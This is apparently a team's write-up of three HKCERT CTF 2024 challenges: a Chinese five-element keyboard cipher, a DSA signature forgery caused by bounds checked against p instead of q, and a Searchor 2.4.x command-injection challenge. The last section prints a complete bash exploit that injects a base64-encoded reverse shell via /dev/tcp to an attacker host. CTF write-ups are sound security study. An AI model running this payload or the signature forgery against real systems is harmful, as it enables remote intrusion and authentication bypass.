# Writeup for HKCERT CTF 2024 Qualifying Round (Team S0064)
[TOC]
## Misc/Tuning Keyboard 5
solved by @sirius9121, @tebbo
### Challenge Overview
We were tasked with deciphering a Chinese passage to locate the flag.

### Solution
First we observe Tuning Keyboard 5.5:
When the [?] button on the bottom left is clicked, the number "5.5" appears. After testing, we observed that each "木" typed on the board produces an additional "5", i.e. "木水木木" generates "5.55".

The keyboard shows the corresponding symbol after only "金" is typed into the box (screenshot not reproduced here).
Further testing shows that the other four elements are also converted into symbols: 火 -> "(", 土 -> ")", 金 -> "^" and 水 -> ".".
The same conversion is displayed when the character "森" is inputted, showing that complex characters made up of the five elements are translated component by component.
Therefore, we can copy the text inside Tuning Keyboard 5 and convert the corresponding characters to code.

However, running the converted text as Python doesn't work! ("lol")
Therefore another language is required. The PHP compiler provided by https://onecompiler.com/ can run the code; the result appears once the PHP code is run.
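As an added example (not part of the original writeup), the converter below turns a five-element passage into the symbol string described above. The element-to-symbol table is the one observed in the challenge; the composite table is an assumption: 森 is three 木 and is expanded through 林 (two 木, itself an assumed entry) to show how further composites could be handled recursively.

```python
# Added example: convert Tuning Keyboard 5 text into the observed symbols.
# ELEMENT_TO_SYMBOL comes from the writeup; COMPOSITES is an assumption
# (森 = three 木 is known; 林 = 木木 is added to illustrate recursion).

ELEMENT_TO_SYMBOL = {
    "木": "5",
    "火": "(",
    "土": ")",
    "金": "^",
    "水": ".",
}

# Composite characters are expanded into their components, recursively.
COMPOSITES = {
    "森": "林木",   # three 木: the two in 林 plus one more
    "林": "木木",   # assumption: the keyboard treats 林 as two 木
}


def decompose(char: str) -> str:
    """Expand one character into a string of base elements."""
    if char in ELEMENT_TO_SYMBOL:
        return char
    if char in COMPOSITES:
        return "".join(decompose(c) for c in COMPOSITES[char])
    raise ValueError(f"unknown character: {char!r}")


def convert(text: str) -> str:
    """Translate a five-element passage into the symbol string.

    Whitespace carries no element and is dropped; every other character
    must decompose into the five elements or a ValueError is raised.
    """
    out = []
    for ch in text:
        if ch.isspace():
            continue
        out.append("".join(ELEMENT_TO_SYMBOL[e] for e in decompose(ch)))
    return "".join(out)


if __name__ == "__main__":
    print(convert("木水木木"))   # 5.55
    print(convert("火森土"))     # (555)
```

Unknown characters raise rather than being silently skipped, so a passage that contains a character outside the table is noticed before the output is fed to an interpreter.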
## Crypto/Almost DSA
solved by @rioho
### Challenge Overview
The flag is given by os.getenv which requires passing the verify() function in the netcat server.
### Solution
The one-byte security flaw lies in verify(): the assertions `0 < r < p` and `0 < s < p` both use p where q was originally intended.
Since w is the modular inverse of the user-supplied s modulo the given q, inputting s as q evaluates w to 0, which in turn makes u1 and u2 evaluate to 0, as both involve multiplying by w.
```python
v = (g ** u1 %p) * (y ** u2 % p) % p % q
```
can be simplified to
```python
v = (1 % p) * (1 % p) % p % q
v = 1
```
Setting `r = 1` therefore passes `assert v == r`.
Since p is derived from q as `r * q + 1` (where this r is a random integer, unrelated to the signature's r), `p - 1` is a multiple of q, so setting `s = p - 1` also gives w = 0 and passes both assertions.
The flag was returned after entering these numbers into the netcat server.
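The following is an added example, not the challenge's own code: a toy DSA verify() with the writeup's flaw (bounds checked against p instead of q) beside a corrected version, on tiny constructed parameters. It assumes the inverse is computed with Fermat's little theorem, `pow(s, q - 2, q)`, which is what yields w = 0 when q divides s, as the writeup observes (Python's `pow(s, -1, q)` would raise instead).

```python
# Added example (not the challenge's code): flawed vs corrected DSA verify().
# Constructed toy parameters: q prime, p = 2*q + 1 prime, g of order q mod p.
Q = 11
P = 2 * Q + 1          # 23, so p - 1 = 2*q is a multiple of q
G = 4                  # 2**2 mod 23, which has order 11
X = 7                  # private key (constructed)
Y = pow(G, X, P)       # public key, 8


def sign(h, k, x=X):
    """Textbook DSA signing of hash value h with per-message secret k."""
    r = pow(G, k, P) % Q
    s = pow(k, -1, Q) * (h + x * r) % Q
    return r, s


def verify_flawed(h, r, s, y=Y):
    """The bug: bounds use p, and Fermat inversion returns 0 when q | s."""
    assert 0 < r < P and 0 < s < P          # should be Q, not P
    w = pow(s, Q - 2, Q)                    # assumption: Fermat inverse; 0 if Q divides s
    u1 = h * w % Q                          # both become 0 when w == 0 ...
    u2 = r * w % Q
    v = (pow(G, u1, P) * pow(y, u2, P)) % P % Q   # ... so v == 1 regardless of h
    return v == r


def verify_fixed(h, r, s, y=Y):
    """Reject r, s outside (0, q); then s is coprime to q and w != 0."""
    if not (0 < r < Q and 0 < s < Q):
        return False
    w = pow(s, -1, Q)                       # raises rather than returning 0
    u1 = h * w % Q
    u2 = r * w % Q
    v = (pow(G, u1, P) * pow(y, u2, P)) % P % Q
    return v == r


def forged_signatures():
    """The writeup's two forgeries: r = 1 with s = q, and r = 1 with s = p - 1."""
    return [(1, Q), (1, P - 1)]


if __name__ == "__main__":
    r, s = sign(5, 3)
    print("genuine:", verify_flawed(5, r, s), verify_fixed(5, r, s))
    for r, s in forged_signatures():
        print(f"forged r={r} s={s}:", verify_flawed(12345, r, s), verify_fixed(12345, r, s))
```

The forged pairs verify for any hash value under the flawed check, which is why the netcat server returns the flag, while the corrected bounds reject them before any inverse is computed.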
## Misc/B6ACP
solved by @rioho
### Challenge Overview
We were required to get the flag from the home folder of the user. The challenge was provided with a step-by-step guide and a website.

### Solution
Given that (according to the step-by-step guide) there is a vulnerability in searchor/2.4.1, we were able to find an exploit script online in [this GitHub repository](https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection).
However, we were not able to get access to the console with this script. After further analysis with Burp Suite, we figured out that the website POSTs to / instead of /search and uses e and q as the parameter names.

We modified the script as below:
```bash=
#!/bin/bash -
default_port="9008"
port="${3:-$default_port}"
rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
plus="+"
echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"
# URL-encode any '+' so it survives the form-encoded POST body
if [ -z "${evil_cmd##*$plus*}" ]
then
    evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
fi
if [ $# -lt 2 ]
then
    echo "[!] Please specify the IP address of the target and the IP address/port of the attacker for the reverse shell, for example:
./exploit.sh <TARGET> <ATTACKER> <PORT> [${default_port} by default]"
    exit 1
else
    echo "[*] Input target is $1"
    echo "[*] Input attacker is $2:${port}"
    echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
    # Changed from the original script: POST to / (not /search), parameters e and q
    curl -s -X POST $1/ -d "e=Google&q=${evil_cmd}" 1> /dev/null
fi
```
After opening a netcat listener on my VPS and running the exploit script, we were able to get the console running and retrieve the flag.
